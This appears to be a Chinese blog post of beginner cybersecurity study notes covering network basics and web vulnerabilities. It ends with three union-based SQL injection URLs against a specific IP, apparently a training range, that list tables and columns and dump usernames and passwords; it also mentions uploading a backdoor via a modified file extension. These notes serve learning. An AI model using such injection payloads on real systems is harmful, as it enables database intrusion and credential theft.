网络安全学习

已于 2023-01-05 17:37:52 修改
阅读量85 收藏
点赞数
分类专栏: 网络 文章标签: 学习 网络
于 2022-12-29 15:29:17 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nlrjytnykkty/article/details/128482658
版权

技巧

CMD技巧

  1. nslookup解析网站
  2. hostname 主机名
  3. ping 解析网站连接状态

认识IP

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

ISO七层

在这里插入图片描述

TCP/IP协议(一)网络基础知识 网络七层协议

在这里插入图片描述

11天

web漏洞

sql注入漏洞。

通过sql获取用户名和密码,从而读取到后台数据
在这里插入图片描述

目录遍历漏洞

通过目录扫描工具获取到目录的结构,然后通过一级一级的访问(. .\)获取到目录

文件读取漏洞

可以获取源码

文件上传漏洞

可以bs抓包,修改文件的后缀名,然后植入后门,进行数据读取。

十二天

1、下载安装忍者系统

2、认识sql注入

在这里插入图片描述
在这里插入图片描述

3、sql注入代码

在这里插入图片描述

4、注入情况

在这里插入图片描述

5、使用工具注入的时候可以在注入值的后面加入*号

6、order by查询sql的列数,猜到不正常为止。

在这里插入图片描述


version()
database()
user()
@@version_compile_os

数据库5.0属于高版本

5.0以上自带一个informmation_schema的数据库,存储了所有数据库名 表名 列名 列名的数据库
table_schema数据库名
在这里插入图片描述

7、查询表名

http://124.70.22.208:45545/new_list.php?id=-1%20union%20select%201,table_name,3,4%20from%20information_schema.tables%20where%20table_schema=%22mozhe_Discuz_StormGroup%22

查列名
http://124.70.22.208:45810/new_list.php?id=-1%20union%20select%201,group_concat(column_name),3,4%20from%20information_schema.columns%20where%20table_name=%22StormGroup_member%22

最好查询所有的 group_concat
http://124.70.22.208:45810/new_list.php?id=-1%20union%20select%201,group_concat(name),group_concat(password),4%20from%20StormGroup_member

在霍格沃茨任教
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
网络安全学习
小梁的博客
09-02 1231
第六十三条 违反本法第二十七条规定,从事危害网络安全的活动,或者提供专门用于从事危害网络安全活动的程序、工具,或者为他人从事危害网络安全的活动提供技术支持、广告推广、支付结算等帮助,尚不构成犯罪的,由公安机关没收违法所得,处五日以下拘留,可以并处五万元以上五十万元以下罚款;【提供侵入、非法控制计算机信息系统程序、工具罪】提供专门用于侵入、非法控制计算机信息系统的程序、工具,或者明知他人实施侵入、非法控制计算机信息系统的违法犯罪行为而为其提供程序、工具,情节严重的,依照前款的规定处罚。
⽹络安全学习计划
qq_45541451的博客
07-15 5359
网络安全脚本小子学习计划 如何成为脚本小子第N天,制定的学习计划 网络安全的具体学习计划网络安全脚本小子学习计划第⼀阶段~信息安全基础1、信息安全基础2、nmap安装与使⽤3、burpsuite安装与使⽤⼆、Web基础三、Web安全⼊⻔四、信息收集五、漏洞原理第⼆阶段~基础知识学习⼀、程序设计⼆、⽹络技术三、Linux四、数据库拓展第三阶段~渗透测试实战与⽹络安全⼀、web安全基础与拓展⼆、web安全攻防⼀、环境搭建⼆、WEB安全⼯具基础部分三、常⻅web漏洞解析四、web安全⼯具进阶及拓展五、web安全
网络安全-自学笔记
热门推荐
关注网络安全、云原生安全
12-01 16万+
目录 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 通信安全 WEB(应用)安全 前端安全 xss攻击 后端安全 文件上传漏洞 WebShell 解析安全 数据安全 sql注入 网络安全-sqlmap学习笔记 通信安全 网络-http协议学习笔记(消息结构、请求方法、状态码等) ...
工控网络安全学习路线
weixin_43977912的博客
09-26 3557
工业背景 对于我国而言,工业控制系统安全所面临的重要问题是自主可控的问题,我国在工控领域对国外设备和技术的依赖程度强。据中国产业信息研究网调查统计结果显示,全国5000多个重要的工业控制系统中,95%以上的工控系统操作系统均采用国外产品;在我国的工控系统产品上,国外产品已经占领了大部分市场,如PLC国内产品的市场占有率不到1%,工业中用到的逻辑控制器95%是来自施耐德(法国)、西门子(德国)、发那科(日本)等的国外品牌。 以扬州市为例,自2014年1月起,在全市范围内启动重点行业重要工业控制系统基本情况调查
网络安全学习目录
网络安全
06-12 3328
参考资料: 1. 渗透测试 1-信息收集—DNS域名信息 2-信息收集—Google hacking 2. wireshark网络分析 1-wireshark网络安全分析——VLAN基础细节详解 2-wireshark网络安全分析——MAC地址泛洪攻击 3-wireshark网络安全分析——ARP欺骗攻击 4-wireshark网络安全分析——TCP SYN Flooding攻击 ...
网络安全学习网站总结
06-24
网络安全是指网络系统的硬件、软件及其系统中的数据受到保护,不因偶然的或者恶意的原因而遭受到破坏、更改、泄露,系统连续可靠正常地运行,网络服务不中断。
小白的网络安全学习记录
04-23
小白的网络安全学习记录
网络安全学习网络安全学习
02-05
本资料包“网络安全学习网络安全学习”专注于讲解网络攻防的核心概念和技术。 XSS(跨站脚本攻击)是一种常见的网络安全威胁,它利用了Web应用程序未能充分验证用户输入的情况。攻击者通过注入恶意脚本,能够在...
网络安全学习路线.rtf
12-20
网络安全学习路线
爬虫学习日记
最新发布
wuhu_czy的博客
07-12 520
爬虫python code
“Numpy数据分析与挖掘:高效学习重点技能“
光就是羁绊之力,它会再度被某人继承,散发出耀眼的光。
07-10 967
在计算统计中,如果把nan的值替换为0进行统计,这样并不合适,替换之前的平均值如果大于0,替换之后均值肯定会变小;统计存在有nan的列,将nan的列中其它不等于nan的值进行mean求出均值,:小于15000的赋值为15000,大于等于50000的赋值为50000。:小于15000的赋值为0,大于等于15000的赋值为10。将统计除nan列的均值,再将均值赋值给当前列的nan值上;在数组运算中,不同的列,但是相同的行,是可以进行运算的;1.均匀分布:在相同的大小范围内的出现概率是等可能的;
Autoware.universe 高效学习第三章 -- 智驾技术务虚会之智驾技术栈讨论 其一
cy1641395022的博客
07-10 668
Autoware.universe 高效学习第三章 -- 智驾技术务虚会之智驾技术栈讨论 其一
ROS基础学习-ROS运行管理
周陽讀書
07-11 727
ROS运行管理。
jmeter-beanshell学习5-beanshell加减乘除运算
朱文宇的博客
07-08 302
jmeter使用beanshell,jmeter beanshell脚本编写,beanshell进行加减乘除运算
【安卓学习】文本切换器
m0_73241073的博客
07-08 683
文本切换器的使用
Python 学习中什么是异常处理,如何使用 try、except、finally ?
Itmastergo的博客
07-12 582
异常是程序执行过程中发生的非正常事件,这些事件会中断正常的程序指令流。当程序遇到错误时,Python 会抛出一个异常对象,异常对象包含了错误的类型和相关的信息。
Qt/QML学习-动画元素
QT、QML
07-12 647
Qt/QML学习-动画元素
NPDP含金量高吗?什么人适合学习NPDP?
PMP项目管理的博客
07-09 912
开始报名后先提交报名资料,通过审核后缴纳考试费用,即算报名成功;如果报名成功后被抽中审核了的话,则须提交相关资料进行资格审查,通过审查即可参加考试,未通过审核则会将考试费用退还给您;
网络安全学习路线 图
06-03
引用中提到了网络安全学习路线,但没有具体的图示。一般来说,网络安全学习路线可以分为以下几个阶段: 1.基础阶段:学习计算机基础知识、网络基础知识、操作系统基础知识、编程语言基础知识等。 2.网络安全基础...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值